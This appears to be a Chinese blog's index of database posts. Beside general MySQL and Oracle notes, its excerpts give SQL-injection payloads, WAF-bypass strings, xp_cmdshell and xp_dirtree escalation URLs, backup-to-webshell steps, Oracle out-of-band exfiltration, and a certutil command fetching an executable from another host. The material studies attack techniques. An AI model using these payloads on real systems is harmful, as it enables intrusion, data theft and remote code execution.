数据库知识点
bylfsj
这个作者很懒,什么都没留下…
展开
-
MySQL数据库事务的四大特性以及事务的隔离级别
目录一、事务的四大特性(ACID)1、原子性(Atomicity)2、一致性(Consistency)3、隔离性(Isolation)4、持久性(Durability)二、事务的隔离级别(默认事务级别为可重复读)MySQL数据库的四种事务隔离级别Read Uncommitted(读取未提交内容...转载 2019-11-13 23:17:56 · 301 阅读 · 0 评论 -
MYSQL总结
1.外键2.唯一索引3.排序4.分页5.聚合查询6.多表7.连接查询8.insert9.UPDATE10.DELETE11.管理11.实用12.事务Read Uncommitted可见,在Read Uncommitted隔离级别下,一个事务可能读取到另一个事务更新但未提交的数据,这个数据有可能是脏数据。Read Committe...原创 2019-11-13 23:08:56 · 331 阅读 · 0 评论 -
各大注入playload---mssql
3.1.7.1. SQL Server Payload¶VersionSELECT @@versionCommentSELECT 1 -- commentSELECT /*comment*/1Current UserSELECT user_name()SELECT system_userSELECT userSELECT loginame FRO...转载 2019-10-30 15:32:27 · 1005 阅读 · 0 评论 -
sqlmap
目录SqlmapSqlmap的简单用法探测指定URL是否存在WAF,并且绕过探测指定URL是否存在SQL注入漏洞查看数据库的所有用户查看数据库所有用户名的密码 查看数据库当前用户 判断当前用户是否有管理权限列出数据库管理员角色查看所有的数据库查看当前的数据库爆出指定...转载 2019-09-23 18:31:38 · 6562 阅读 · 0 评论 -
MSSQL补充
SQL Server CLRMicrosoft SQL Server 现在具备与 Microsoft Windows .NET Framework 的公共语言运行时 (CLR) 组件集成的功能。CLR 为托管代码提供服务,例如跨语言集成、代码访问安全性、对象生存期管理以及调试和分析支持。对于 SQL Server 用户和应用程序开发人员来说,CLR 集成意味着您现在可以使用任何 .NET Fra...原创 2019-10-15 19:40:28 · 281 阅读 · 0 评论 -
Oracle注入
Oracle数据库Oracle数据库也是一种关系数据库,此数据库体量较大,一般与jsp网站联合既然是关系数据库,肯定也是存在一些关系表,在Oracle数据库中,库的概念被淡化,强调用户Oracle注入之联合查询注入原理其注入原理与MySQL一致,都是基于回显的注入,通过union all se...转载 2019-10-15 11:58:39 · 580 阅读 · 0 评论 -
MSSQL提权总结
http://192.168.130.137/1.aspx?id=1;CREATE TABLE tmp (dir varchar(8000),num int,num1 int);http://192.168.130.137/1.aspx?id=1;insert into tmp(dir,num,num1) execute master..xp_dirtree 'c:',1,1...转载 2019-10-11 20:51:46 · 800 阅读 · 0 评论 -
mssql差异备份拿shell
简介差异备份数据库得到webshell。在sql server 里dbo和sa权限都有备份数据库权限,我们可以把数据库备份称asp文件,这样我们就可以通过mssqlserver的备份数据库功能生成一个网页小马。 差异备份的流程大概这样:1.完整备份一次(保存位置当然可以改)backup database 库名 to disk = 'c:\ddd.b...转载 2019-10-11 19:55:02 · 790 阅读 · 0 评论 -
access暴库
原创 2019-10-14 15:52:57 · 278 阅读 · 0 评论 -
waf绕过实战
*本文作者:blacksunny;本文属 FreeBuf 原创奖励计划,未经许可禁止转载。一、前言本人喜欢遇到好的东西,乐于分享,关注freebuf有段时间了,写过两篇文章,每次写写文章,不仅仅是为了挣点稿费。而是通过此平台能够认识一些安全圈的小伙伴,互相学习,共同进步。在安全行业也有些曲折,发过工控协议fuzzing的入门教程,也发过...转载 2019-09-29 15:44:48 · 1311 阅读 · 0 评论 -
WAF
知己知彼,百战不殆 --孙子兵法[目录]0x0 前言0x1 WAF的常见特征0x2 绕过WAF的方法0x3 SQLi Filter的实现及Evasion...转载 2019-09-26 20:59:37 · 2897 阅读 · 0 评论 -
mssql log备份getshell
log备份的总结当SQL注入是得到DB权限时候,接下来可以做的工作很多,象找管理员密码,后台管理这些都可以帮助你拿到WEBSHELL,但是这篇文章讲的是log备份,LOG备份出来的小马的体积小,而且备份的成功的可性很大,所以是我作为对DB权限的第一种试探方法. 但是在LOG备份中,我们经常会遇到一些很让我们头痛的问题,那就是闭合的问题LOG备份产生的文件更小log备份L...转载 2019-10-12 19:46:55 · 553 阅读 · 0 评论 -
一篇文章由浅入深了解MSSQL注入
MSSQL提权与站库分离0x00 xp_cmdshellexec master.dbo.xp_cmdshell 'cd c:www & certutil -urlcache -split -f http://192.168.130.142:80/download/file.exe';exec master.dbo.xp_cmdshell 'cd c:www & fil...原创 2019-10-12 19:46:40 · 437 阅读 · 1 评论 -
MSSQL—bypass安全狗
and ~1=(select top 1 name from[sysobjects] where xtype=0x75 and name not in (CHAR(105)%2BCHAR(110)%2BCHAR(102)%2BCHAR(111),CHAR(97)%2BCHAR(100)%2BCHAR(109)%2BCHAR(105)%2BCHAR(110)));http://192...转载 2019-10-11 21:17:44 · 500 阅读 · 0 评论 -
MSSQL----报错注入/时间/布尔
1.简介在上一章我们已经了解到了报错注入,其实MSSQL报错注入利用的就是显示或隐式转换来报错注入,比如以下就是典型的隐式转换select * from admin where id =1 and (select user)>0--select * from admin where id =1|(select user)--在将 nvarchar 值 ‘dbo’ 转换成数据...转载 2019-10-11 20:39:55 · 3713 阅读 · 0 评论 -
SQL注入点构造
在测试过程中,经常需要自己本地构造注入点来进行SQL测试,这边分享一下,不同环境下构造SQL注入的代码。PHP+MYSQL版<?php$con = mysql_connect("localhost","root","root");if (!$con) { die('Could not connect: ' . mysql_error()); }mysql_...转载 2019-10-11 19:38:56 · 758 阅读 · 0 评论 -
mysql 延时注入新思路
这里可以代码看看<?phprequire 'conn.php';$id = $_GET['id'];if(preg_match("/(sleep|benchmark|outfile|dumpfile|load_file|join)/i", $_GET['id'])){ die("you bad bad!");}$sql = "select * from article ...转载 2019-10-11 19:37:06 · 409 阅读 · 0 评论 -
sqlmap----实战https
-================================================================== 记一次SQL注入 目标地址:https://www.xxxx.com/ 之前补天提交过这个注入 后来貌似”修复了”(实际就是装了安全狗和过滤了一些关键字) 不过今天试了...转载 2019-10-11 19:36:00 · 6232 阅读 · 0 评论 -
ORACLE
Oracle注入之带外通信和DNSLOG注入非常相似,例如和mysql中load_file()函数实现无回显注入非常相似。下面介绍这个技术中常用的函数和使用。 环境这里准备两台测试,一台注入点的靶机,一台接受回显数据的平台。接受的数据的靶机:nc -vvlp 2008 0x01 utl_http.request()函数&...转载 2019-10-11 18:54:49 · 228 阅读 · 0 评论 -
oracle union注入
原创 SQL注入--Oracle ...转载 2019-10-11 16:43:26 · 603 阅读 · 0 评论 -
ACESS
1.条件1.IIF(exp,true,false)2.switch(exp1,value1,exp2,value2…)2.高级语句select top原创 2019-10-11 15:15:14 · 307 阅读 · 0 评论 -
SQL SERVER 知识点
1.函数基本一致substring(pre,fir,end)原创 2019-10-11 15:07:19 · 276 阅读 · 0 评论 -
Oracle知识点总结
1.DUAL表ROLLUP和CUBE3.函数3.1 字符串处理函数CHR(X)CONCAT()substr(x,start,length)4.数据库安全性原创 2019-10-11 14:49:31 · 217 阅读 · 0 评论 -
MYSQL总结
1.函数总结1.1常用函数pi()round()----------------近似pow(x,y)--------------乘积ceil -------------------取上floor-------------------取下1.2字符串函数length() ------------concat(s1,s2,…) ------------concat_ws() ...原创 2019-10-10 20:11:20 · 233 阅读 · 0 评论 -
SQL知识要点总结
1.DESC-------降序2.where 操作符注意:between 常用于< , >被取代后。当两个值时,可以用not 取代<>可以用 like 取代 =3.and / or 结合用法代替 or, 用 in4.通配符进行过滤%通配符_ 通配符【】 通配符5.字段5.1拼接字段5.2 别名5...原创 2019-10-09 20:52:06 · 553 阅读 · 0 评论 -
sql源码解析
sqlmap1.0 源码解析 前面学习了最初版本的sqlmap,了解了大概的注入流程,同时也知道了大概的sqlmap的结构,这次学习一下sqlmap1.0的源码,看看相比之前的注入流程变化了多少,相比之前的设计增加了哪些东西以及看看sqlmap代码结构设计精巧的地方。 博主加:这篇文章已经写了好久了,但是发博客的话又要重写上传图片,太麻烦了。最近完成了博客升级计划中的本...转载 2019-09-30 21:59:53 · 974 阅读 · 0 评论 -
oracle注入
联合查询注入order by 3--and 1=2 union select null,null,null from dual--and 1=2 union select 'null',null,null from dual-- //返回正常,则第一个字段是数字型,返回错误,为字符型and 1=2 union select 1,'2','3' from dual-- ...转载 2019-09-28 16:55:16 · 620 阅读 · 0 评论 -
Access数据库偏移注入
前言 本来想好好介绍一下Access数据库的偏移注入,找个目标来试试,但是找了好久都没有找到,又想自己要不在本地搭建一个?额。。。还是算了吧,没有太多的时间,之后在网上搜索了一些“偏移注入”看看其他人是否有写这个方面的资料,但是非常少,不过还是找到了几个,下...转载 2019-09-25 22:13:54 · 902 阅读 · 0 评论 -
Access数据库及注入方法
目录Access数据库Access数据库中的函数 盲注Access数据库 Sqlmap注入Access数据库Access数据库Microsoft Office Access是由微软发布的关系数据库管理系统。Microsoft Office Access是微软把数据库引擎的图形用...转载 2019-09-23 18:03:38 · 501 阅读 · 0 评论 -
注入篇————MYSQL过滤特殊符号的字符型注入方法
一、过滤了特殊符号的字符型注入例如下面的过滤代码:function blacklist($id){ $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive) $id= preg_replace('/and/i',"", ...转载 2019-09-23 17:36:11 · 1273 阅读 · 0 评论 -
sql with rollup的绕过
题目地址:http://ctf5.shiyanbar.com/web/pcat/index.php 通读源码,得知出flag的条件1.需要post提交uname以及pwd,否则直接die了1 if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {2 echo '<form action="" m...转载 2019-09-18 22:29:18 · 553 阅读 · 0 评论